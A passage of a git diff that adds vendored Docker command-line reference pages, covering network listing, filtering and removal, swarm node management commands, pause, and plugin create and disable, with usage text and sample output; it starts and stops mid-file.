+      --no-trunc        Do not truncate the output
+  -q, --quiet           Only display network IDs
+```
+
+Lists all the networks the Engine `daemon` knows about. This includes the
+networks that span across multiple hosts in a cluster, for example:
+
+```bash
+$ sudo docker network ls
+NETWORK ID          NAME                DRIVER          SCOPE
+7fca4eb8c647        bridge              bridge          local
+9f904ee27bf5        none                null            local
+cf03ee007fb4        host                host            local
+78b03ee04fc4        multi-host          overlay         swarm
+```
+
+Use the `--no-trunc` option to display the full network id:
+
+```bash
+$ docker network ls --no-trunc
+NETWORK ID                                                         NAME                DRIVER           SCOPE
+18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3   none                null             local
+c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47   host                host             local
+7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185   bridge              bridge           local
+95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd   foo                 bridge           local
+63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161   dev                 bridge           local
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there
+is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`).
+Multiple filter flags are combined as an `OR` filter. For example,
+`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks.
+
+The currently supported filters are:
+
+* driver
+* id (network's id)
+* label (`label=<key>` or `label=<key>=<value>`)
+* name (network's name)
+* type (custom|builtin)
+
+#### Driver
+
+The `driver` filter matches networks based on their driver.
+
+The following example matches networks with the `bridge` driver:
+
+```bash
+$ docker network ls --filter driver=bridge
+NETWORK ID          NAME                DRIVER            SCOPE
+db9db329f835        test1               bridge            local
+f6e212da9dfd        test2               bridge            local
+```
+
+#### ID
+
+The `id` filter matches on all or part of a network's ID.
+
+The following filter matches all networks with an ID containing the
+`63d1ff1f77b0...` string.
+
+```bash
+$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161
+NETWORK ID          NAME                DRIVER           SCOPE
+63d1ff1f77b0        dev                 bridge           local
+```
+
+You can also filter for a substring in an ID as this shows:
+
+```bash
+$ docker network ls --filter id=95e74588f40d
+NETWORK ID          NAME                DRIVER          SCOPE
+95e74588f40d        foo                 bridge          local
+
+$ docker network ls --filter id=95e
+NETWORK ID          NAME                DRIVER          SCOPE
+95e74588f40d        foo                 bridge          local
+```
+
+#### Label
+
+The `label` filter matches networks based on the presence of a `label` alone or a `label` and a
+value.
+
+The following filter matches networks with the `usage` label regardless of its value.
+
+```bash
+$ docker network ls -f "label=usage"
+NETWORK ID          NAME                DRIVER         SCOPE
+db9db329f835        test1               bridge         local
+f6e212da9dfd        test2               bridge         local
+```
+
+The following filter matches networks with the `usage` label with the `prod` value.
+
+```bash
+$ docker network ls -f "label=usage=prod"
+NETWORK ID          NAME                DRIVER        SCOPE
+f6e212da9dfd        test2               bridge        local
+```
+
+#### Name
+
+The `name` filter matches on all or part of a network's name.
+
+The following filter matches all networks with a name containing the `foobar` string.
+
+```bash
+$ docker network ls --filter name=foobar
+NETWORK ID          NAME                DRIVER       SCOPE
+06e7eef0a170        foobar              bridge       local
+```
+
+You can also filter for a substring in a name as this shows:
+
+```bash
+$ docker network ls --filter name=foo
+NETWORK ID          NAME                DRIVER       SCOPE
+95e74588f40d        foo                 bridge       local
+06e7eef0a170        foobar              bridge       local
+```
+
+#### Type
+
+The `type` filter supports two values; `builtin` displays predefined networks
+(`bridge`, `none`, `host`), whereas `custom` displays user defined networks.
+
+The following filter matches all user defined networks:
+
+```bash
+$ docker network ls --filter type=custom
+NETWORK ID          NAME                DRIVER       SCOPE
+95e74588f40d        foo                 bridge       local  
+63d1ff1f77b0        dev                 bridge       local
+```
+
+By having this flag it allows for batch cleanup. For example, use this filter
+to delete all user defined networks:
+
+```bash
+$ docker network rm `docker network ls --filter type=custom -q`
+```
+
+A warning will be issued when trying to remove a network that has containers
+attached.
+
+## Formatting
+
+The formatting options (`--format`) pretty-prints networks output
+using a Go template.
+
+Valid placeholders for the Go template are listed below:
+
+Placeholder | Description
+------------|------------------------------------------------------------------------------------------
+`.ID`       | Network ID
+`.Name`     | Network name
+`.Driver`   | Network driver
+`.Scope`    | Network scope (local, global)
+`.IPv6`     | Whether IPv6 is enabled on the network or not.
+`.Internal` | Whether the network is internal or not.
+`.Labels`   | All labels assigned to the network.
+`.Label`    | Value of a specific label for this network. For example `{{.Label "project.version"}}`
+
+When using the `--format` option, the `network ls` command will either
+output the data exactly as the template declares or, when using the
+`table` directive, includes column headers as well.
+
+The following example uses a template without headers and outputs the
+`ID` and `Driver` entries separated by a colon for all networks:
+
+```bash
+$ docker network ls --format "{{.ID}}: {{.Driver}}"
+afaaab448eb2: bridge
+d1584f8dc718: host
+391df270dc66: null
+```
+
+## Related information
+
+* [network disconnect ](network_disconnect.md)
+* [network connect](network_connect.md)
+* [network create](network_create.md)
+* [network inspect](network_inspect.md)
+* [network rm](network_rm.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
new file mode 100644
index 0000000000..5b65465600
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md
@@ -0,0 +1,45 @@
+---
+title: "network prune"
+description: "Remove unused networks"
+keywords: "network, prune, delete"
+---
+
+# network prune
+
+```markdown
+Usage:	docker network prune [OPTIONS]
+
+Remove all unused networks
+
+Options:
+  -f, --force   Do not prompt for confirmation
+      --help    Print usage
+```
+
+Remove all unused networks. Unused networks are those which are not referenced by any containers.
+
+Example output:
+
+```bash
+$ docker network prune
+WARNING! This will remove all networks not used by at least one container.
+Are you sure you want to continue? [y/N] y
+Deleted Networks:
+n1
+n2
+```
+
+## Related information
+
+* [network disconnect ](network_disconnect.md)
+* [network connect](network_connect.md)
+* [network create](network_create.md)
+* [network ls](network_ls.md)
+* [network inspect](network_inspect.md)
+* [network rm](network_rm.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
+* [system df](system_df.md)
+* [container prune](container_prune.md)
+* [image prune](image_prune.md)
+* [volume prune](volume_prune.md)
+* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
new file mode 100644
index 0000000000..f06b4c002d
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md
@@ -0,0 +1,59 @@
+---
+title: "network rm"
+description: "the network rm command description and usage"
+keywords: "network, rm, user-defined"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# network rm
+
+```markdown
+Usage:  docker network rm NETWORK [NETWORK...]
+
+Remove one or more networks
+
+Aliases:
+  rm, remove
+
+Options:
+      --help   Print usage
+```
+
+Removes one or more networks by name or identifier. To remove a network,
+you must first disconnect any containers connected to it.
+To remove the network named 'my-network':
+
+```bash
+  $ docker network rm my-network
+```
+
+To delete multiple networks in a single `docker network rm` command, provide
+multiple network names or ids. The following example deletes a network with id
+`3695c422697f` and a network named `my-network`:
+
+```bash
+  $ docker network rm 3695c422697f my-network
+```
+
+When you specify multiple networks, the command attempts to delete each in turn.
+If the deletion of one network fails, the command continues to the next on the
+list and tries to delete that. The command reports success or failure for each
+deletion.
+
+## Related information
+
+* [network disconnect ](network_disconnect.md)
+* [network connect](network_connect.md)
+* [network create](network_create.md)
+* [network ls](network_ls.md)
+* [network inspect](network_inspect.md)
+* [network prune](network_prune.md)
+* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
new file mode 100644
index 0000000000..9a81bb9c04
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md
@@ -0,0 +1,42 @@
+---
+title: "node demote"
+description: "The node demote command description and usage"
+keywords: "node, demote"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node demote
+
+```markdown
+Usage:  docker node demote NODE [NODE...]
+
+Demote one or more nodes from manager in the swarm
+
+Options:
+      --help   Print usage
+
+```
+
+Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm.
+
+
+```bash
+$ docker node demote <node name>
+```
+
+## Related information
+
+* [node inspect](node_inspect.md)
+* [node ls](node_ls.md)
+* [node promote](node_promote.md)
+* [node ps](node_ps.md)
+* [node rm](node_rm.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
new file mode 100644
index 0000000000..fac688fe40
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md
@@ -0,0 +1,137 @@
+---
+title: "node inspect"
+description: "The node inspect command description and usage"
+keywords: "node, inspect"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node inspect
+
+```markdown
+Usage:  docker node inspect [OPTIONS] self|NODE [NODE...]
+
+Display detailed information on one or more nodes
+
+Options:
+  -f, --format string   Format the output using the given Go template
+      --help            Print usage
+      --pretty          Print the information in a human friendly format.
+```
+
+Returns information about a node. By default, this command renders all results
+in a JSON array. You can specify an alternate format to execute a
+given template for each result. Go's
+[text/template](http://golang.org/pkg/text/template/) package describes all the
+details of the format.
+
+Example output:
+
+    $ docker node inspect swarm-manager
+    [
+    {
+        "ID": "e216jshn25ckzbvmwlnh5jr3g",
+        "Version": {
+            "Index": 10
+        },
+        "CreatedAt": "2016-06-16T22:52:44.9910662Z",
+        "UpdatedAt": "2016-06-16T22:52:45.230878043Z",
+        "Spec": {
+            "Role": "manager",
+            "Availability": "active"
+        },
+        "Description": {
+            "Hostname": "swarm-manager",
+            "Platform": {
+                "Architecture": "x86_64",
+                "OS": "linux"
+            },
+            "Resources": {
+                "NanoCPUs": 1000000000,
+                "MemoryBytes": 1039843328
+            },
+            "Engine": {
+                "EngineVersion": "1.12.0",
+                "Plugins": [
+                    {
+                        "Type": "Volume",
+                        "Name": "local"
+                    },
+                    {
+                        "Type": "Network",
+                        "Name": "overlay"
+                    },
+                    {
+                        "Type": "Network",
+                        "Name": "null"
+                    },
+                    {
+                        "Type": "Network",
+                        "Name": "host"
+                    },
+                    {
+                        "Type": "Network",
+                        "Name": "bridge"
+                    },
+                    {
+                        "Type": "Network",
+                        "Name": "overlay"
+                    }
+                ]
+            }
+        },
+        "Status": {
+            "State": "ready",
+            "Addr": "168.0.32.137"
+        },
+        "ManagerStatus": {
+            "Leader": true,
+            "Reachability": "reachable",
+            "Addr": "168.0.32.137:2377"
+        }
+    }
+    ]
+
+    {% raw %}
+    $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self
+    false
+    {% endraw %}
+
+    $ docker node inspect --pretty self
+    ID:                     e216jshn25ckzbvmwlnh5jr3g
+    Hostname:               swarm-manager
+    Joined at:              2016-06-16 22:52:44.9910662 +0000 utc
+    Status:
+     State:                 Ready
+     Availability:          Active
+     Address:               172.17.0.2
+    Manager Status:
+     Address:               172.17.0.2:2377
+     Raft Status:           Reachable
+     Leader:                Yes
+    Platform:
+     Operating System:      linux
+     Architecture:          x86_64
+    Resources:
+     CPUs:                  4
+     Memory:                7.704 GiB
+    Plugins:
+      Network:              overlay, bridge, null, host, overlay
+      Volume:               local
+    Engine Version:         1.12.0
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node ls](node_ls.md)
+* [node promote](node_promote.md)
+* [node ps](node_ps.md)
+* [node rm](node_rm.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
new file mode 100644
index 0000000000..5f61713c2e
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md
@@ -0,0 +1,130 @@
+---
+title: "node ls"
+description: "The node ls command description and usage"
+keywords: "node, list"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node ls
+
+```markdown
+Usage:  docker node ls [OPTIONS]
+
+List nodes in the swarm
+
+Aliases:
+  ls, list
+
+Options:
+  -f, --filter value   Filter output based on conditions provided
+      --help           Print usage
+  -q, --quiet          Only display IDs
+```
+
+Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
+
+Example output:
+
+```bash
+$ docker node ls
+
+ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
+1bcef6utixb0l0ca7gxuivsj0    swarm-worker2   Ready   Active
+38ciaotwjuritcdtn9npbnkuz    swarm-worker1   Ready   Active
+e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
+```
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
+than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* [id](node_ls.md#id)
+* [label](node_ls.md#label)
+* [membership](node_ls.md#membership)
+* [name](node_ls.md#name)
+* [role](node_ls.md#role)
+
+#### ID
+
+The `id` filter matches all or part of a node's id.
+
+```bash
+$ docker node ls -f id=1
+
+ID                         HOSTNAME       STATUS  AVAILABILITY  MANAGER STATUS
+1bcef6utixb0l0ca7gxuivsj0  swarm-worker2  Ready   Active
+```
+
+#### Label
+
+The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering.
+
+The following filter matches nodes with the `foo` label regardless of its value.
+
+```bash
+$ docker node ls -f "label=foo"
+
+ID                         HOSTNAME       STATUS  AVAILABILITY  MANAGER STATUS
+1bcef6utixb0l0ca7gxuivsj0  swarm-worker2  Ready   Active
+```
+
+#### Membership
+
+The `membership` filter matches nodes based on the presence of a `membership` and a value
+`accepted` or `pending`.
+
+The following filter matches nodes with the `membership` of `accepted`.
+
+```bash
+$ docker node ls -f "membership=accepted"
+
+ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
+1bcef6utixb0l0ca7gxuivsj0    swarm-worker2   Ready   Active
+38ciaotwjuritcdtn9npbnkuz    swarm-worker1   Ready   Active
+```
+
+#### Name
+
+The `name` filter matches on all or part of a node hostname.
+
+The following filter matches the nodes with a name equal to `swarm-master` string.
+
+```bash
+$ docker node ls -f name=swarm-manager1
+
+ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
+e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
+```
+
+#### Role
+
+The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`.
+
+The following filter matches nodes with the `manager` role.
+
+```bash
+$ docker node ls -f "role=manager"
+
+ID                           HOSTNAME        STATUS  AVAILABILITY  MANAGER STATUS
+e216jshn25ckzbvmwlnh5jr3g *  swarm-manager1  Ready   Active        Leader
+```
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node inspect](node_inspect.md)
+* [node promote](node_promote.md)
+* [node ps](node_ps.md)
+* [node rm](node_rm.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
new file mode 100644
index 0000000000..92092a8935
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md
@@ -0,0 +1,41 @@
+---
+title: "node promote"
+description: "The node promote command description and usage"
+keywords: "node, promote"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node promote
+
+```markdown
+Usage:  docker node promote NODE [NODE...]
+
+Promote one or more nodes to manager in the swarm
+
+Options:
+      --help   Print usage
+```
+
+Promotes a node to manager. This command targets a docker engine that is a manager in the swarm.
+
+
+```bash
+$ docker node promote <node name>
+```
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node inspect](node_inspect.md)
+* [node ls](node_ls.md)
+* [node ps](node_ps.md)
+* [node rm](node_rm.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
new file mode 100644
index 0000000000..7f07c5ea64
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md
@@ -0,0 +1,107 @@
+---
+title: "node ps"
+description: "The node ps command description and usage"
+keywords: node, tasks, ps
+aliases: ["/engine/reference/commandline/node_tasks/"]
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node ps
+
+```markdown
+Usage:  docker node ps [OPTIONS] [NODE...]
+
+List tasks running on one or more nodes, defaults to current node.
+
+Options:
+  -f, --filter value   Filter output based on conditions provided
+      --help           Print usage
+      --no-resolve     Do not map IDs to Names
+      --no-trunc       Do not truncate output
+```
+
+Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options.
+
+Example output:
+
+    $ docker node ps swarm-manager1
+    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
+    redis.1.7q92v0nr1hcgts2amcjyqg3pq   redis:3.0.6  swarm-manager1  Running        Running 5 hours
+    redis.6.b465edgho06e318egmgjbqo4o   redis:3.0.6  swarm-manager1  Running        Running 29 seconds
+    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+    redis.9.dkkual96p4bb3s6b10r7coxxt   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+    redis.10.0tgctg8h8cech4w0k0gwrmr23  redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more
+than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`)
+
+The currently supported filters are:
+
+* [name](#name)
+* [id](#id)
+* [label](#label)
+* [desired-state](#desired-state)
+
+#### name
+
+The `name` filter matches on all or part of a task's name.
+
+The following filter matches all tasks with a name containing the `redis` string.
+
+    $ docker node ps -f name=redis swarm-manager1
+    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
+    redis.1.7q92v0nr1hcgts2amcjyqg3pq   redis:3.0.6  swarm-manager1  Running        Running 5 hours
+    redis.6.b465edgho06e318egmgjbqo4o   redis:3.0.6  swarm-manager1  Running        Running 29 seconds
+    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+    redis.9.dkkual96p4bb3s6b10r7coxxt   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+    redis.10.0tgctg8h8cech4w0k0gwrmr23  redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+
+
+#### id
+
+The `id` filter matches a task's id.
+
+    $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1
+    NAME                                IMAGE        NODE            DESIRED STATE  CURRENT STATE
+    redis.7.bg8c07zzg87di2mufeq51a2qp   redis:3.0.6  swarm-manager1  Running        Running 5 seconds
+
+
+#### label
+
+The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a
+value.
+
+The following filter matches tasks with the `usage` label regardless of its value.
+
+```bash
+$ docker node ps -f "label=usage"
+NAME                               IMAGE        NODE            DESIRED STATE  CURRENT STATE
+redis.6.b465edgho06e318egmgjbqo4o  redis:3.0.6  swarm-manager1  Running        Running 10 minutes
+redis.7.bg8c07zzg87di2mufeq51a2qp  redis:3.0.6  swarm-manager1  Running        Running 9 minutes
+```
+
+
+#### desired-state
+
+The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`.
+
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node inspect](node_inspect.md)
+* [node ls](node_ls.md)
+* [node promote](node_promote.md)
+* [node rm](node_rm.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
new file mode 100644
index 0000000000..b245d636cc
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md
@@ -0,0 +1,73 @@
+---
+title: "node rm"
+description: "The node rm command description and usage"
+keywords: "node, remove"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# node rm
+
+```markdown
+Usage:	docker node rm [OPTIONS] NODE [NODE...]
+
+Remove one or more nodes from the swarm
+
+Aliases:
+  rm, remove
+
+Options:
+  -f, --force   Force remove a node from the swarm
+      --help    Print usage
+```
+
+When run from a manager node, removes the specified nodes from a swarm.
+
+
+Example output:
+
+```nohighlight
+$ docker node rm swarm-node-02
+
+Node swarm-node-02 removed from swarm
+```
+
+Removes the specified nodes from the swarm, but only if the nodes are in the
+down state. If you attempt to remove an active node you will receive an error:
+
+```nohighlight
+$ docker node rm swarm-node-03
+
+Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not
+down and can't be removed
+```
+
+If you lose access to a worker node or need to shut it down because it has been
+compromised or is not behaving as expected, you can use the `--force` option.
+This may cause transient errors or interruptions, depending on the type of task
+being run on the node.
+
+```nohighlight
+$ docker node rm --force swarm-node-03
+
+Node swarm-node-03 removed from swarm
+```
+
+A manager node must be demoted to a worker node (using `docker node demote`)
+before you can remove it from the swarm.
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node inspect](node_inspect.md)
+* [node ls](node_ls.md)
+* [node promote](node_promote.md)
+* [node ps](node_ps.md)
+* [node update](node_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
new file mode 100644
index 0000000000..aa65d0309e
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/node_update.md
@@ -0,0 +1,71 @@
+---
+title: "node update"
+description: "The node update command description and usage"
+keywords: "resources, update, dynamically"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+## update
+
+```markdown
+Usage:  docker node update [OPTIONS] NODE
+
+Update a node
+
+Options:
+      --availability string   Availability of the node (active/pause/drain)
+      --help                  Print usage
+      --label-add value       Add or update a node label (key=value) (default [])
+      --label-rm value        Remove a node label if exists (default [])
+      --role string           Role of the node (worker/manager)
+```
+
+### Add label metadata to a node
+
+Add metadata to a swarm node using node labels. You can specify a node label as
+a key with an empty value:
+
+``` bash
+$ docker node update --label-add foo worker1
+```
+
+To add multiple labels to a node, pass the `--label-add` flag for each label:
+
+``` bash
+$ docker node update --label-add foo --label-add bar worker1
+```
+
+When you [create a service](service_create.md),
+you can use node labels as a constraint. A constraint limits the nodes where the
+scheduler deploys tasks for a service.
+
+For example, to add a `type` label to identify nodes where the scheduler should
+deploy message queue service tasks:
+
+``` bash
+$ docker node update --label-add type=queue worker1
+```
+
+The labels you set for nodes using `docker node update` apply only to the node
+entity within the swarm. Do not confuse them with the docker daemon labels for
+[dockerd](https://docs.docker.com/engine/userguide/labels-custom-metadata/#daemon-labels).
+
+For more information about labels, refer to [apply custom
+metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/).
+
+## Related information
+
+* [node demote](node_demote.md)
+* [node inspect](node_inspect.md)
+* [node ls](node_ls.md)
+* [node promote](node_promote.md)
+* [node ps](node_ps.md)
+* [node rm](node_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/pause.md b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md
new file mode 100644
index 0000000000..e2dd800d5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/pause.md
@@ -0,0 +1,40 @@
+---
+title: "pause"
+description: "The pause command description and usage"
+keywords: "cgroups, container, suspend, SIGSTOP"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# pause
+
+```markdown
+Usage:  docker pause CONTAINER [CONTAINER...]
+
+Pause all processes within one or more containers
+
+Options:
+      --help   Print usage
+```
+
+The `docker pause` command suspends all processes in the specified containers.
+On Linux, this uses the cgroups freezer. Traditionally, when suspending a process
+the `SIGSTOP` signal is used, which is observable by the process being suspended.
+With the cgroups freezer the process is unaware, and unable to capture,
+that it is being suspended, and subsequently resumed. On Windows, only Hyper-V
+containers can be paused.
+
+See the
+[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt)
+for further details.
+
+## Related information
+
+* [unpause](unpause.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
new file mode 100644
index 0000000000..9d4e99e56a
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md
@@ -0,0 +1,60 @@
+---
+title: "plugin create"
+description: "the plugin create command description and usage"
+keywords: "plugin, create"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin create
+
+```markdown
+Usage:  docker plugin create [OPTIONS] PLUGIN PLUGIN-DATA-DIR
+
+Create a plugin from a rootfs and configuration. Plugin data directory must contain config.json and rootfs directory.
+
+Options:
+      --compress   Compress the context using gzip 
+      --help       Print usage
+```
+
+Creates a plugin. Before creating the plugin, prepare the plugin's root filesystem as well as
+[the config.json](../../extend/config.md)
+
+
+The following example shows how to create a sample `plugin`.
+
+```bash
+
+$ ls -ls /home/pluginDir
+
+4 -rw-r--r--  1 root root 431 Nov  7 01:40 config.json
+0 drwxr-xr-x 19 root root 420 Nov  7 01:40 rootfs
+
+$ docker plugin create plugin /home/pluginDir
+plugin
+
+NAME                  	TAG                 DESCRIPTION                  ENABLED
+plugin                  latest              A sample plugin for Docker   true
+```
+
+The plugin can subsequently be enabled for local use or pushed to the public registry.
+
+## Related information
+
+* [plugin disable](plugin_disable.md)
+* [plugin enable](plugin_enable.md)
+* [plugin inspect](plugin_inspect.md)
+* [plugin install](plugin_install.md)
+* [plugin ls](plugin_ls.md)
+* [plugin push](plugin_push.md)
+* [plugin rm](plugin_rm.md)
+* [plugin set](plugin_set.md)
+* [plugin upgrade](plugin_upgrade.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
new file mode 100644
index 0000000000..451f1ace9c
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md
@@ -0,0 +1,66 @@
+---
+title: "plugin disable"
+description: "the plugin disable command description and usage"
+keywords: "plugin, disable"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# plugin disable
+
+```markdown
+Usage:  docker plugin disable [OPTIONS] PLUGIN
+
+Disable a plugin
+
+Options:
+  -f, --force   Force the disable of an active plugin
+      --help    Print usage
+```
+
+Disables a plugin. The plugin must be installed before it can be disabled,
+see [`docker plugin install`](plugin_install.md). Without the `-f` option,
+a plugin that has references (eg, volumes, networks) cannot be disabled.
+
+
+The following example shows that the `sample-volume-plugin` plugin is installed
+and enabled:
+
+```bash
+$ docker plugin ls
+
+ID                  NAME                             TAG                 DESCRIPTION                ENABLED
+69553ca1d123        tiborvass/sample-volume-plugin   latest              A test plugin for Docker   true
+```
+
+To disable the plugin, use the following command:
+
+```bash
+$ docker plugin disable tiborvass/sample-volume-plugin
+
+tiborvass/sample-volume-plugin
+
+$ docker plugin ls
+
